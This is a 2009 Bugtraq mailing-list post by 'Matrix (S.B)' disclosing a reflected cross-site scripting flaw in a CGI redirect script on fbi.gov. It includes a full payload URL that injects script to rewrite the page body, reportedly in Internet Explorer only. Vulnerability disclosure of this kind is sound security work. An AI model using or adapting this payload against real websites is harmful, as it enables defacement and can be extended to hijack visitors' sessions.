FBI XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FBI XSS Vulnerability
From: sohrab_behroozian@xxxxxxxxx
Date: 17 Jan 2009 08:06:40 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

by : Matrix (S.B)

Ok it is not the first time, but they had fixed them all. It will probably be 
the third or fourth time they try to address this damn cgi! Here is the XSS 
that Matrix submitted to Securityfocus (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>

Prev by Date: [ MDVSA-2009:018 ] tomcat5
Next by Date: Ralinktech wireless cards drivers vulnerability
Previous by thread: [ MDVSA-2009:018 ] tomcat5
Next by thread: Ralinktech wireless cards drivers vulnerability
Index(es):
- Date
- Thread